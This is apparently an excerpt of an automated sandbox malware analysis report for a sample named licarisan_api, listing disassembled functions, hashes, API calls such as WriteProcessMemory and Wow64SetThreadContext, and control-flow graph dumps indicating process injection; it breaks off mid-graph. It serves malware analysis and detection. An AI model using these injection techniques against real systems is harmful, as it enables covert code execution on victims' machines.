                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 619214c3e5a3058d34d35521a5284d92c864d374118d3281ab188b51134c118b
                                    • Instruction ID: e582d12f4acdadda0878b0c11b86b8c30a814041013db2b22d4af808d8c2f324
                                    • Opcode Fuzzy Hash: 619214c3e5a3058d34d35521a5284d92c864d374118d3281ab188b51134c118b
                                    • Instruction Fuzzy Hash: A77129F1E052349BFB248B16ED54BFA7B79EB90304F5481FAD90995281E33C5EC28E16
                                    Function 007A5124 Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 13a8f68aebe97f782617a511845e494522d71a4e75c60e010fd7f09a2a0da807
                                    • Instruction ID: a58ffe6f8b1d22f210c7890636013dfefc0dbd6abb55dbf0a74ed632a9852390
                                    • Opcode Fuzzy Hash: 13a8f68aebe97f782617a511845e494522d71a4e75c60e010fd7f09a2a0da807
                                    • Instruction Fuzzy Hash: A471CDB2D045299BEB248B21DC81BFBB775FB85300F1482FAD94DA6280E73C4AC18F51
                                    Function 0042E524 Relevance: 1.7, APIs: 1, Instructions: 164nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: ba1cc31d0c88f6aef3822014f82c047920296f7077fa3ea0d75ebe0a76e9a7d9
                                    • Instruction ID: 440fae91d327c565061e70a3e96d93802fc45ef6f237214261ed9f1b2abbfcc9
                                    • Opcode Fuzzy Hash: ba1cc31d0c88f6aef3822014f82c047920296f7077fa3ea0d75ebe0a76e9a7d9
                                    • Instruction Fuzzy Hash: 895138F2E115249BF7248B16ED54BFA7775EB90300F1481FAE90E96680E37C5EC28E15
                                    Function 007A565E Relevance: 1.6, APIs: 1, Instructions: 148memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 98d220a4b5e1035ce006cf79f8ea403279570493bd21e1ed02f51f1394f4d810
                                    • Instruction ID: 1940eba6b73940bce2698a16db336ba32097f5e8bfb2c772a6217e7b9e5a6e1b
                                    • Opcode Fuzzy Hash: 98d220a4b5e1035ce006cf79f8ea403279570493bd21e1ed02f51f1394f4d810
                                    • Instruction Fuzzy Hash: 9151E0B2E11A189FF714CA14DC94BEA7775EBD5310F1482FAD90E96680E63C9EC08F52
                                    Function 0042FF22 Relevance: 1.6, APIs: 1, Instructions: 140nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 457de24abc2bd8b7b3db86834dedcf4f06d0eb2dedc7f88d5f268d39de80beaa
                                    • Instruction ID: d32315c2f187db8c00685ea05710848eef26f72ab350f25835a7500a030024d7
                                    • Opcode Fuzzy Hash: 457de24abc2bd8b7b3db86834dedcf4f06d0eb2dedc7f88d5f268d39de80beaa
                                    • Instruction Fuzzy Hash: 95614774E046288FCB24CF14DD90BAAB7B5BB88304F5492EAD84967742D7359EC5CF05
                                    Function 0042EBBD Relevance: 1.6, APIs: 1, Instructions: 137nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 53494c96e5c41a9ed8580b7c4256b96fbb85e3242e627180d02b1d793d09e8b5
                                    • Instruction ID: 4b383a7f64ab4de5b14ff84ca0b4aee6b1d0042ad3809ebab42d8f257d9bbb81
                                    • Opcode Fuzzy Hash: 53494c96e5c41a9ed8580b7c4256b96fbb85e3242e627180d02b1d793d09e8b5
                                    • Instruction Fuzzy Hash: D45102B1E021348BFB208B46ED50BFEB775EB90315F5480FAD809A6681E33C5EC18E56
                                    Function 0042EC16 Relevance: 1.6, APIs: 1, Instructions: 131nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: ed53983577d839336978f1c4c7c9ffa7f5f9c4774ac7ffa7696d59e9c267a36b
                                    • Instruction ID: d236c70cddcf24224fc922163b3e4d87239442ee075ec223541648e8caf7581d
                                    • Opcode Fuzzy Hash: ed53983577d839336978f1c4c7c9ffa7f5f9c4774ac7ffa7696d59e9c267a36b
                                    • Instruction Fuzzy Hash: 6C51C2B1E015348BFB208B56ED50BFAB775EB90315F5481FAD809A6680E37D5EC28E06
                                    Function 0042E128 Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 59b96a7e03e3e154233bd28a83264b2fcd50b070ed18dbb281069cc5cca4998d
                                    • Instruction ID: 9d22583756bd24dedb6dba5f55f4be0aa5ed676206682e24c0b653548d0947b7
                                    • Opcode Fuzzy Hash: 59b96a7e03e3e154233bd28a83264b2fcd50b070ed18dbb281069cc5cca4998d
                                    • Instruction Fuzzy Hash: F24124B2E015349BFB108B56ED50BFAB775EB90305F5480F6D80996681E33C5EC28E16
                                    Function 0042FAD8 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 98109882c5c7f1c1375aa6ef229a7b3645570b6e1452f044a586097a4846f725
                                    • Instruction ID: 3d04a27d395e48e51a6c9c73a46cda455ee9ba22b9cf41dab17f151a34bfbf16
                                    • Opcode Fuzzy Hash: 98109882c5c7f1c1375aa6ef229a7b3645570b6e1452f044a586097a4846f725
                                    • Instruction Fuzzy Hash: 5531E4F2D041546EF7104A10ED59BFB7B78EFC0710F9881FAE80995A40E73CAAC58A23
                                    Function 00420086 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?), ref: 004201B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0cd2dee5ffb09907395a8b6e0818bfec24ea02c41f48140d78a19e9205e884f3
                                    • Instruction ID: 77bfc9207910e74e27480ba8babaf3dbab6122e275df6dfddbe8dcd9bfb9c06c
                                    • Opcode Fuzzy Hash: 0cd2dee5ffb09907395a8b6e0818bfec24ea02c41f48140d78a19e9205e884f3
                                    • Instruction Fuzzy Hash: A741AFB1E052689FEB24CA14DC94AEAB7B9EF84301F1481EAD40D67241D63D6FC2CF55
                                    Function 0043016F Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: bb58763c6801842cd884df31a5fddf9b9c32978f1ef520ba747addf34dc300a5
                                    • Instruction ID: 4075c7030f5a98178fc78b35fdea173907f065eef25f62e80d73637c3e9b955d
                                    • Opcode Fuzzy Hash: bb58763c6801842cd884df31a5fddf9b9c32978f1ef520ba747addf34dc300a5
                                    • Instruction Fuzzy Hash: 0F112B71D042948FEB208A10DCA4BAF7BB8AF89304F1411EAD40D56242D3398FC2CF56
                                    Function 0042F6B2 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 61bb3190126198079ceea71dc4512d4902bf5cdaa3fc606d593d4dd975b19e6b
                                    • Instruction ID: e087a1090b37ba22b4c0fd1ae312a5ddf0caf599e1dd05cb8563adf610420983
                                    • Opcode Fuzzy Hash: 61bb3190126198079ceea71dc4512d4902bf5cdaa3fc606d593d4dd975b19e6b
                                    • Instruction Fuzzy Hash: AAF02DB3D041606AF3301511AC55FDF36749FD5724F8941FBD90811141E53D8A9A86E7
                                    Function 004301D6 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: ef5ac068e6e92f2813fda9ced1d7621b155711c41080f4ab687b4912409fd79f
                                    • Instruction ID: 0291b4720daeebef37745f5f1a3360ff1ff2a91a3fabe03789dbd40f267432d8
                                    • Opcode Fuzzy Hash: ef5ac068e6e92f2813fda9ced1d7621b155711c41080f4ab687b4912409fd79f
                                    • Instruction Fuzzy Hash: 180192709042688BEB348B50DC657AF7BB5AF89314F1052EED45E66281D7394EC1CF06
                                    Function 007F1F5F Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 289threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1567 7f1f5f-7f1fdb 1570 7f1fee-7f2003 1567->1570 1571 7f1fdd-7f1fe9 1567->1571 1573 7f2016-7f2035 1570->1573 1574 7f2005-7f2011 1570->1574 1572 7f22df-7f2311 Wow64SetThreadContext 1571->1572 1581 7f2318-7f384a call 7f3833 1572->1581 1576 7f2048-7f205a 1573->1576 1577 7f2037-7f2043 1573->1577 1574->1572 1578 7f206d-7f20d6 1576->1578 1579 7f205c-7f2068 1576->1579 1577->1572 1582 7f20dc-7f2126 1578->1582 1583 7f22d3-7f22d9 1578->1583 1579->1572 1609 7f384c-7f3856 1581->1609 1610 7f385b-7f38a6 call 7f3889 1581->1610 1585 7f2137-7f2148 1582->1585 1583->1572 1587 7f214e-7f215e 1585->1587 1588 7f21e9-7f223a 1585->1588 1587->1588 1590 7f2164-7f21b5 1587->1590 1591 7f223c-7f2246 1588->1591 1592 7f2248-7f229f call 7f225c 1588->1592 1602 7f21db 1590->1602 1603 7f21b7-7f21d9 1590->1603 1597 7f22b7-7f22be 1591->1597 1604 7f22ad 1592->1604 1605 7f22a1-7f22ab 1592->1605 1600 7f22ce 1597->1600 1601 7f22c0-7f22cc 1597->1601 1600->1572 1601->1572 1602->1585 1603->1602 1607 7f21e2 1603->1607 1604->1597 1605->1597 1607->1588 1611 7f3b17-7f3b44 call 7f3b45 1609->1611 1616 7f38a8-7f38b2 1610->1616 1617 7f38b7-7f38bd 1610->1617 1616->1611 1618 7f38c3-7f391b 1617->1618 1621 7f3922-7f39e9 1618->1621 1625 7f39eb-7f3a01 1621->1625 1626 7f3a03-7f3a13 1621->1626 1627 7f3a66-7f3a6d 1625->1627 1626->1621 1628 7f3a19-7f3a2c 1626->1628 1630 7f3aaf-7f3afb 1627->1630 1631 7f3a6f-7f3a7b call 7f3a7d 1627->1631 1628->1621 1629 7f3a32-7f3a42 1628->1629 1632 7f3a44-7f3a4e 1629->1632 1633 7f3a50 1629->1633 1635 7f3b0d 1630->1635 1636 7f3afd-7f3b07 1630->1636 1631->1630 1637 7f3a5a-7f3a60 1632->1637 1633->1637 1635->1611 1636->1618 1636->1635 1637->1627
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: afdd83b162e3952562d753411be16f942b1e521efde50fe3138e8c9840486d8f
                                    • Instruction ID: 30b64705fa23584c3c85d65378045caddab87302b89654d0e0e502fe28d144eb
                                    • Opcode Fuzzy Hash: afdd83b162e3952562d753411be16f942b1e521efde50fe3138e8c9840486d8f
                                    • Instruction Fuzzy Hash: 04D1AA71D085A88FDB24CB14CC94BAABBB6AB84314F1481EAD50D67346DB389FC2CF51
                                    Function 007F19C3 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 237COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1639 7f19c3-7f19e6 1640 7f1a0c 1639->1640 1641 7f19e8-7f1a0a 1639->1641 1644 7f1a1a-7f1a6b 1640->1644 1648 7f197f-7f198f 1640->1648 1641->1640 1642 7f1a13 1641->1642 1642->1644 1646 7f1a6d-7f1a77 1644->1646 1647 7f1a79-7f1ad0 1644->1647 1649 7f1ae8-7f1aef 1646->1649 1650 7f1ade 1647->1650 1651 7f1ad2-7f1adc 1647->1651 1648->1644 1652 7f1995-7f19c2 call 7f19c3 1648->1652 1653 7f1aff-7f1b0a 1649->1653 1654 7f1af1-7f1afd 1649->1654 1650->1649 1651->1649 1652->1639 1657 7f1b10-7f1b17 1653->1657 1654->1657 1659 7f1b1d-7f1ba8 call 7f1b75 1657->1659 1660 7f1beb-7f1c7e call 7f1c53 1657->1660 1659->1660 1669 7f1baa-7f1be6 call 7f1bc4 1659->1669 1670 7f1c8f-7f1cda 1660->1670 1671 7f1c80-7f1c8a 1660->1671 1682 7f22eb-7f2311 Wow64SetThreadContext 1669->1682 1673 7f1cdc-7f1ce6 1670->1673 1674 7f1ceb-7f1d08 call 7f1d09 1670->1674 1675 7f1f4b-7f1f5d call 7f1f5f 1671->1675 1673->1675 1674->1675 1684 7f2318-7f384a call 7f3833 1682->1684 1692 7f384c-7f3856 1684->1692 1693 7f385b-7f38a6 call 7f3889 1684->1693 1694 7f3b17-7f3b44 call 7f3b45 1692->1694 1699 7f38a8-7f38b2 1693->1699 1700 7f38b7-7f38bd 1693->1700 1699->1694 1701 7f38c3-7f391b 1700->1701 1704 7f3922-7f39e9 1701->1704 1708 7f39eb-7f3a01 1704->1708 1709 7f3a03-7f3a13 1704->1709 1710 7f3a66-7f3a6d 1708->1710 1709->1704 1711 7f3a19-7f3a2c 1709->1711 1713 7f3aaf-7f3afb 1710->1713 1714 7f3a6f-7f3a7b call 7f3a7d 1710->1714 1711->1704 1712 7f3a32-7f3a42 1711->1712 1715 7f3a44-7f3a4e 1712->1715 1716 7f3a50 1712->1716 1718 7f3b0d 1713->1718 1719 7f3afd-7f3b07 1713->1719 1714->1713 1720 7f3a5a-7f3a60 1715->1720 1716->1720 1718->1694 1719->1701 1719->1718 1720->1710
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-1470631180
                                    • Opcode ID: b463970f0d89497039e7cfcfe4d07a5b5630f972d390365c723b86f7a9d61eb6
                                    • Instruction ID: 3734144da80842d56e9f490ac40656e2717cd4e40f3c60cfeecb93772f7b0d27
                                    • Opcode Fuzzy Hash: b463970f0d89497039e7cfcfe4d07a5b5630f972d390365c723b86f7a9d61eb6
                                    • Instruction Fuzzy Hash: 539135B1D081989AE721CA24DC98BFA7BBAEBC1300F1480FAD54D62281D67D5FC58F52
                                    Function 00436052 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 183COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-387579111
                                    • Opcode ID: c947a5f6c6faef15b0f8d9270cf409503bd818610059257ae062bec5b4e5a598
                                    • Instruction ID: a7d04d56f37adb75bb28cf199130b3e55a7e0637d5ee998a12293a881adbe0e4
                                    • Opcode Fuzzy Hash: c947a5f6c6faef15b0f8d9270cf409503bd818610059257ae062bec5b4e5a598
                                    • Instruction Fuzzy Hash: 9E714871D085A59BFB20CA14CC48BEB7BB5AF85305F08C0FAC44D56642CA7C5EC98F92
                                    Function 007F1B75 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 175COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2781 7f1b75-7f1ba8 2783 7f1beb-7f1c7e call 7f1c53 2781->2783 2784 7f1baa-7f2311 call 7f1bc4 Wow64SetThreadContext 2781->2784 2793 7f1c8f-7f1cda 2783->2793 2794 7f1c80-7f1c8a 2783->2794 2795 7f2318-7f384a call 7f3833 2784->2795 2796 7f1cdc-7f1ce6 2793->2796 2797 7f1ceb-7f1d08 call 7f1d09 2793->2797 2798 7f1f4b-7f1f5d call 7f1f5f 2794->2798 2811 7f384c-7f3856 2795->2811 2812 7f385b-7f38a6 call 7f3889 2795->2812 2796->2798 2797->2798 2813 7f3b17-7f3b44 call 7f3b45 2811->2813 2818 7f38a8-7f38b2 2812->2818 2819 7f38b7-7f38bd 2812->2819 2818->2813 2820 7f38c3-7f391b 2819->2820 2823 7f3922-7f39e9 2820->2823 2827 7f39eb-7f3a01 2823->2827 2828 7f3a03-7f3a13 2823->2828 2829 7f3a66-7f3a6d 2827->2829 2828->2823 2830 7f3a19-7f3a2c 2828->2830 2832 7f3aaf-7f3afb 2829->2832 2833 7f3a6f-7f3a7b call 7f3a7d 2829->2833 2830->2823 2831 7f3a32-7f3a42 2830->2831 2834 7f3a44-7f3a4e 2831->2834 2835 7f3a50 2831->2835 2837 7f3b0d 2832->2837 2838 7f3afd-7f3b07 2832->2838 2833->2832 2839 7f3a5a-7f3a60 2834->2839 2835->2839 2837->2813 2838->2820 2838->2837 2839->2829
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 2fa419f07c77daf7b8228eda2a7785d092c42e85ca4c169e05ed10ecbfc0d40b
                                    • Instruction ID: 07a0c009ee393c90484ec07a362f9c7772d2daa91b5cb53d01012b800c3d30ac
                                    • Opcode Fuzzy Hash: 2fa419f07c77daf7b8228eda2a7785d092c42e85ca4c169e05ed10ecbfc0d40b
                                    • Instruction Fuzzy Hash: 8A610CB1D086A8DEE7218B24DC48BEABB79EB85310F0440FAD54D66341C67D4BC5CF62
                                    Function 007EF990 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 154injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2841 7ef990-7ef9d1 2842 7ef9df-7efa36 2841->2842 2843 7ef9d3-7ef9dd 2841->2843 2846 7efa38-7efa42 2842->2846 2847 7efa44 2842->2847 2844 7efa4e-7efa55 2843->2844 2848 7efa57-7efa63 2844->2848 2849 7efa65 2844->2849 2846->2844 2847->2844 2850 7efa76-7efab7 WriteProcessMemory 2848->2850 2849->2850 2852 7efabe-7efbf2 2850->2852 2853 7efab9-7f384a call 7f3833 2850->2853 2858 7efbf4-7efbfe 2852->2858 2859 7efc03-7efc4e 2852->2859 2875 7f384c-7f3856 2853->2875 2876 7f385b-7f38a6 call 7f3889 2853->2876 2861 7efebf-7efed7 call 7efed3 2858->2861 2866 7efc5f-7efcc3 2859->2866 2867 7efc50-7efc5a 2859->2867 2873 7efed9-7efef8 2861->2873 2874 7efcca-7efd91 call 7efcde 2866->2874 2867->2861 2877 7efefe-7effa6 call 7effad 2873->2877 2878 7f080b-7f082a call 7f0823 2873->2878 2912 7efdab-7efdbb 2874->2912 2913 7efd93-7efda9 2874->2913 2880 7f3b17-7f3b44 call 7f3b45 2875->2880 2892 7f38a8-7f38b2 2876->2892 2893 7f38b7-7f38bd 2876->2893 2896 7f0831-7f089e 2878->2896 2897 7f082c call 7f0839 2878->2897 2892->2880 2898 7f38c3-7f391b 2893->2898 2903 7f08af-7f08fa call 7f08d2 2896->2903 2904 7f08a0-7f08aa 2896->2904 2897->2896 2909 7f3922-7f39e9 2898->2909 2920 7f08fc-7f0906 2903->2920 2921 7f090b-7f09a2 call 7f09a4 2903->2921 2907 7f0b6b-7f0b92 call 7f0b80 call 7f0b93 2904->2907 2928 7f39eb-7f3a01 2909->2928 2929 7f3a03-7f3a13 2909->2929 2912->2874 2919 7efdc1-7efdd4 2912->2919 2918 7efe0e-7efe15 2913->2918 2922 7efe57-7efe6a call 7efe6b 2918->2922 2923 7efe17-7efe55 2918->2923 2919->2874 2926 7efdda-7efdea 2919->2926 2920->2907 2921->2907 2922->2861 2923->2861 2933 7efdec-7efdf6 2926->2933 2934 7efdf8 2926->2934 2936 7f3a66-7f3a6d 2928->2936 2929->2909 2937 7f3a19-7f3a2c 2929->2937 2940 7efe02-7efe08 2933->2940 2934->2940 2943 7f3aaf-7f3afb 2936->2943 2944 7f3a6f-7f3a7b call 7f3a7d 2936->2944 2937->2909 2941 7f3a32-7f3a42 2937->2941 2940->2918 2945 7f3a44-7f3a4e 2941->2945 2946 7f3a50 2941->2946 2949 7f3b0d 2943->2949 2950 7f3afd-7f3b07 2943->2950 2944->2943 2951 7f3a5a-7f3a60 2945->2951 2946->2951 2949->2880 2950->2898 2950->2949 2951->2936
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 3559483778-1470631180
                                    • Opcode ID: aeb2d352934d302cb29a201b852559e95f7a5102fb8154f512ce6a659375c7ef
                                    • Instruction ID: c709e9f7eb1b4b1a59a1af7688ca13a5339640ef7f4cc91ab9be0e9dc71fa50e
                                    • Opcode Fuzzy Hash: aeb2d352934d302cb29a201b852559e95f7a5102fb8154f512ce6a659375c7ef
                                    • Instruction Fuzzy Hash: AD5127B1D091E88AE721C715DC58BEA7BB5AB86310F1480FAD04E66781C6BC5FC58F62
                                    Function 007F16B2 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 138COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2956 7f16b2-7f176b call 7f1746 2960 7f17ae-7f180c 2956->2960 2961 7f176d-7f17a9 2956->2961 2962 7f181f-7f1834 2960->2962 2963 7f180e-7f181a 2960->2963 2973 7f22eb-7f2311 Wow64SetThreadContext 2961->2973 2966 7f1847-7f1866 2962->2966 2967 7f1836-7f1842 2962->2967 2965 7f1b10-7f1b17 2963->2965 2971 7f1b1d-7f1ba8 call 7f1b75 2965->2971 2972 7f1beb-7f1c7e call 7f1c53 2965->2972 2969 7f1879-7f188b 2966->2969 2970 7f1868-7f1874 2966->2970 2967->2965 2975 7f189e-7f1907 2969->2975 2976 7f188d-7f1899 2969->2976 2970->2965 2971->2972 2990 7f1baa-7f1be6 call 7f1bc4 2971->2990 2991 7f1c8f-7f1cda 2972->2991 2992 7f1c80-7f1c8a 2972->2992 2979 7f2318-7f384a call 7f3833 2973->2979 2984 7f190d-7f1957 2975->2984 2985 7f1b04-7f1b0a 2975->2985 2976->2965 3023 7f384c-7f3856 2979->3023 3024 7f385b-7f38a6 call 7f3889 2979->3024 2986 7f1968-7f1979 2984->2986 2985->2965 2993 7f197f-7f198f 2986->2993 2994 7f1a1a-7f1a6b 2986->2994 2990->2973 2997 7f1cdc-7f1ce6 2991->2997 2998 7f1ceb-7f1d08 call 7f1d09 2991->2998 3001 7f1f4b-7f1f5d call 7f1f5f 2992->3001 2993->2994 3002 7f1995-7f19e6 call 7f19c3 2993->3002 2999 7f1a6d-7f1a77 2994->2999 3000 7f1a79-7f1ad0 2994->3000 2997->3001 2998->3001 3006 7f1ae8-7f1aef 2999->3006 3008 7f1ade 3000->3008 3009 7f1ad2-7f1adc 3000->3009 3025 7f1a0c 3002->3025 3026 7f19e8-7f1a0a 3002->3026 3015 7f1aff 3006->3015 3016 7f1af1-7f1afd 3006->3016 3008->3006 3009->3006 3015->2985 3016->2965 3027 7f3b17-7f3b44 call 7f3b45 3023->3027 3034 7f38a8-7f38b2 3024->3034 3035 7f38b7-7f38bd 3024->3035 3025->2986 3026->3025 3029 7f1a13 3026->3029 3029->2994 3034->3027 3036 7f38c3-7f391b 3035->3036 3039 7f3922-7f39e9 3036->3039 3043 